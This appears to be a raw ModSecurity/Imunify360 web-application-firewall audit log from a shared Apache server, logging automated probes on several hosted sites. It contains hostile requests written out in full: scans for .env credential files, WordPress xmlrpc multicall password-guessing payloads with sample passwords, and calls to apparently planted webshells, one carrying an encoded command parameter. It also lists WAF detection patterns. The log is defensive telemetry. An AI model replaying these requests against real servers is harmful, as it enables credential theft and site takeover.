text/html; charset=UTF-8 --4c1e073a-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/js/js/privacy-policy.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e96f3d31-Z-- --ff03355c-A-- [30/Jun/2025:16:24:18.297504 +0530] aGJs2UKJU2jJ5HjzTb-IUAAAACc 192.253.209.59 12677 192.168.74.40 443 --ff03355c-B-- GET /.env.save HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --ff03355c-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --ff03355c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280857724489 573510 (- - -) Stopwatch2: 1751280857724489 573510; combined=3394, p1=94, p2=3091, p3=0, p4=0, p5=208, sr=46, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ff03355c-Z-- --2fd7ad02-A-- [30/Jun/2025:16:24:18.906068 +0530] aGJs2nP8dICYN5ByOwq_1gAAAE4 35.231.13.116 58460 192.168.74.40 80 --2fd7ad02-B-- POST /xmlrpc.php HTTP/1.1 Host: sridinterior.com Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml Content-Length: 491 --2fd7ad02-C-- <?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data> <value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>sridint1</string></value><value><string>admin@123</string></value></data></array></value></data></array></value></member></struct></value> </data></array></value></param></params></methodCall> --2fd7ad02-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Content-Length: 401 Content-Type: text/xml; charset=UTF-8 --2fd7ad02-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --33a9fd18-Z-- --df6e3460-A-- [30/Jun/2025:16:24:19.838246 +0530] aGJs27w99McSIwt3IU_o-QAAABg 192.253.209.68 7669 192.168.74.40 443 --df6e3460-B-- POST /.env.save HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --df6e3460-C-- 0x%5B%5D=DTAB --df6e3460-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --df6e3460-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280859785783 52860 (- - -) Stopwatch2: 1751280859785783 52860; combined=8754, p1=113, p2=8253, p3=0, p4=0, p5=388, sr=46, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --df6e3460-Z-- --0ba67767-A-- [30/Jun/2025:16:24:19.968461 +0530] aGJs27aLDYq5_2IGGROL3AAAAD0 35.231.13.116 65202 192.168.74.40 80 --0ba67767-B-- POST /xmlrpc.php HTTP/1.1 Host: sridinterior.com Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml Content-Length: 490 --0ba67767-C-- <?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data> <value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>sridint1</string></value><value><string>password</string></value></data></array></value></data></array></value></member></struct></value> </data></array></value></param></params></methodCall> --0ba67767-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2fa4bc70-Z-- --ea461103-A-- [30/Jun/2025:16:25:19.501929 +0530] aGJtFnJgnyIVeL53SheiJAAAAEc 192.253.209.99 16747 192.168.74.40 443 --ea461103-B-- GET /.env.old HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept-Encoding: * Accept: */* Connection: keep-alive --ea461103-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --ea461103-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: Pattern match "\\.(asa|asax|ascx|backup|bak|bat|cdx|cer|cfg|cmd|com|config|conf|cs|csproj|csr|dat|db|dbf|dll|dos|htr|htw|ida|idc|idq|inc|ini|key|licx|lnk|log|mdb|old|pass|pdb|pol|printer|pwd|rdb|resources|resx|sql|swp|sys|vb|vbs|vbproj|vsdisco|webinfo|xsd|xsx)$" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "115"] [id "77350457"] [msg "IM360 WAF: Bad file extension||RSV:7.05||RS:0||T:APACHE||MVN:REQUEST_FILENAME||MV:/.env.old||User:adminsu||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280918871091 631191 (- - -) Stopwatch2: 1751280918871091 631191; combined=3493, p1=87, p2=3255, p3=0, p4=0, p5=151, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ea461103-Z-- --d8484211-A-- [30/Jun/2025:16:25:19.924498 +0530] aGJtF35HkdacaMgZ4rsP6QAAAFI 172.70.54.157 47296 192.168.74.40 80 --d8484211-B-- GET /wp-admin/images/xmrlpc.php HTTP/1.1 Host: mondofusion.com X-Real-IP: 62.197.145.21 X-Remote-IP: 172.70.54.157 x-forwarded-for: 62.197.145.21 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 cf-ray: 957d2174bdf2dabd-MIA Insecure-Flag: 1 accept-encoding: gzip cdn-loop: cloudflare; loops=1 cf-connecting-ip: 62.197.145.21 cf-ipcountry: US cf-visitor: {"scheme":"http"} X-Forwarded-Proto: http --d8484211-F-- HTTP/1.1 404 Not Found Content-Length: 315 Content-Type: text/html; charset=iso-8859-1 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e17da577-Z-- --078b8c4e-A-- [30/Jun/2025:16:25:20.775188 +0530] aGJtGPwVxPWQHjBdc98QzQAAACI 192.253.209.67 57869 192.168.74.40 443 --078b8c4e-B-- POST /.env.old HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --078b8c4e-C-- 0x%5B%5D=DTAB --078b8c4e-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --078b8c4e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: Pattern match "\\.(asa|asax|ascx|backup|bak|bat|cdx|cer|cfg|cmd|com|config|conf|cs|csproj|csr|dat|db|dbf|dll|dos|htr|htw|ida|idc|idq|inc|ini|key|licx|lnk|log|mdb|old|pass|pdb|pol|printer|pwd|rdb|resources|resx|sql|swp|sys|vb|vbs|vbproj|vsdisco|webinfo|xsd|xsx)$" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "115"] [id "77350457"] [msg "IM360 WAF: Bad file extension||RSV:7.05||RS:0||T:APACHE||MVN:REQUEST_FILENAME||MV:/.env.old||User:adminsu||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280920710030 65749 (- - -) Stopwatch2: 1751280920710030 65749; combined=13257, p1=179, p2=12693, p3=0, p4=0, p5=385, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --078b8c4e-Z-- --38aa3b15-A-- [30/Jun/2025:16:25:21.248655 +0530] aGJtGesmfybBQBs2r_gaCAAAAFE 20.171.207.232 35988 192.168.74.40 443 --38aa3b15-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/images/js/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --38aa3b15-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --38aa3b15-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/images/js/luxury-mini-buses-coaches.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --38aa3b15-Z-- --860e5d3c-A-- [30/Jun/2025:16:25:21.892567 +0530] aGJtGZzhhZfKxw4cfpwMDgAAAAw 192.253.209.67 4293 192.168.74.40 443 --860e5d3c-B-- GET /.env.prod HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept-Encoding: * Accept: */* Connection: keep-alive --860e5d3c-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --860e5d3c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280921844415 48592 (- - -) Stopwatch2: 1751280921844415 48592; combined=4485, p1=110, p2=4224, p3=0, p4=0, p5=150, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --860e5d3c-Z-- --7a967a18-A-- [30/Jun/2025:16:25:21.907739 +0530] aGJtGc0SQPrb5ANBj4JCzQAAADc 206.189.150.36 46316 192.168.74.40 443 --7a967a18-B-- POST /wp-content/plugins/elementor/assets/js/packages/editor/qtype_match.php HTTP/1.1 Host: sathrampalliativecare.com Accept: */* Sec-Fetch-Site: none Accept-Encoding: gzip,deflate Sec-Fetch-Mode: navigate user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15 Accept-Language: eo;q=0.8,en-US;q=0.6,en;q=0.4 Sec-Fetch-Dest: document Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 122 Content-Type: application/x-www-form-urlencoded --7a967a18-C-- ent=3d3e716971217173686f752123744868496a466f6c7351756b537179436b544958232f237343467867406a724e4b485867624a56233a647968753a --7a967a18-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --af296375-Z-- --606acf0d-A-- [30/Jun/2025:16:27:24.190539 +0530] aGJtk0Qg396l8ScOSlFy2QAAAAc 192.253.209.58 25647 192.168.74.40 443 --606acf0d-B-- POST /.env.prod HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --606acf0d-C-- 0x%5B%5D=DTAB --606acf0d-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --606acf0d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281043609314 581551 (- - -) Stopwatch2: 1751281043609314 581551; combined=8635, p1=122, p2=8147, p3=0, p4=0, p5=366, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --606acf0d-Z-- --84ec1a7d-A-- [30/Jun/2025:16:27:25.053907 +0530] aGJtlcMI--vd3cs0wwm1lQAAAAg 20.171.207.232 40964 192.168.74.40 443 --84ec1a7d-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/js/large.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --84ec1a7d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --84ec1a7d-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/js/large.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/js/large.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --84ec1a7d-Z-- --6035b535-A-- [30/Jun/2025:16:27:25.375425 +0530] aGJtlaJM_0FGIXuWxZGiAQAAABo 192.253.209.104 14447 192.168.74.40 443 --6035b535-B-- GET /.env.production HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept-Encoding: * Accept: */* Connection: keep-alive --6035b535-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --6035b535-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281045319422 56222 (- - -) Stopwatch2: 1751281045319422 56222; combined=3608, p1=108, p2=3330, p3=0, p4=0, p5=170, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6035b535-Z-- --87098f7a-A-- [30/Jun/2025:16:27:25.773018 +0530] aGJtla26cFlwO3LDychZkQAAADg 172.70.54.157 49282 192.168.74.40 80 --87098f7a-B-- GET /.tmb/plugins.php HTTP/1.1 Host: mondofusion.com X-Real-IP: 62.197.145.21 X-Remote-IP: 172.70.54.157 x-forwarded-for: 62.197.145.21 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 cf-ray: 957d24874d04dabd-MIA Insecure-Flag: 1 accept-encoding: gzip cdn-loop: cloudflare; loops=1 cf-connecting-ip: 62.197.145.21 cf-ipcountry: US cf-visitor: {"scheme":"http"} X-Forwarded-Proto: http --87098f7a-F-- HTTP/1.1 404 Not Found Content-Length: 315 Content-Type: text/html; charset=iso-8859-1 --87098f7a-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4fbe953c-Z-- --9438e421-A-- [30/Jun/2025:16:28:25.874215 +0530] aGJt0SG8xpltoVrRBTVNDAAAAAY 192.253.209.70 61225 192.168.74.40 443 --9438e421-B-- POST /.env.production HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --9438e421-C-- 0x%5B%5D=DTAB --9438e421-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --9438e421-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281105201344 673310 (- - -) Stopwatch2: 1751281105201344 673310; combined=9521, p1=133, p2=9002, p3=0, p4=0, p5=385, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9438e421-Z-- --61ac3713-A-- [30/Jun/2025:16:28:26.333997 +0530] aGJt0qbBThX8qGqBndJiqAAAADo 20.171.207.232 46854 192.168.74.40 443 --61ac3713-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/images/aainag/tnc.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --61ac3713-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --61ac3713-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/images/aainag/tnc.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/images/aainag/tnc.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --61ac3713-Z-- --5efbf42d-A-- [30/Jun/2025:16:28:27.291366 +0530] aGJt03jeluSyCEHwIHd_KQAAADY 192.253.209.89 38089 192.168.74.40 443 --5efbf42d-B-- GET /.env.development%20 HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --5efbf42d-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --5efbf42d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281107247139 44556 (- - -) Stopwatch2: 1751281107247139 44556; combined=4139, p1=106, p2=3870, p3=0, p4=0, p5=162, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5efbf42d-Z-- --5efbf42d-A-- [30/Jun/2025:16:28:27.525931 +0530] aGJt06bBThX8qGqBndJiqQAAADo 20.171.207.232 46854 192.168.74.40 443 --5efbf42d-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/images/js/Rajasthan-Travel-Guides/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --5efbf42d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --5efbf42d-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/images/js/Rajasthan-Travel-Guides/privacy-policy.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/images/js/Rajasthan-Travel-Guides/privacy-policy.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281107510495 15601 (- - -) Stopwatch2: 1751281107510495 15601; combined=3143, p1=178, p2=2837, p3=0, p4=0, p5=128, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b1428a72-Z-- --162cf259-A-- [30/Jun/2025:16:31:31.285268 +0530] aGJui2CECAzpimnDb-m4-gAAABc 192.253.209.56 49623 192.168.74.40 443 --162cf259-B-- GET /api/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --162cf259-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked 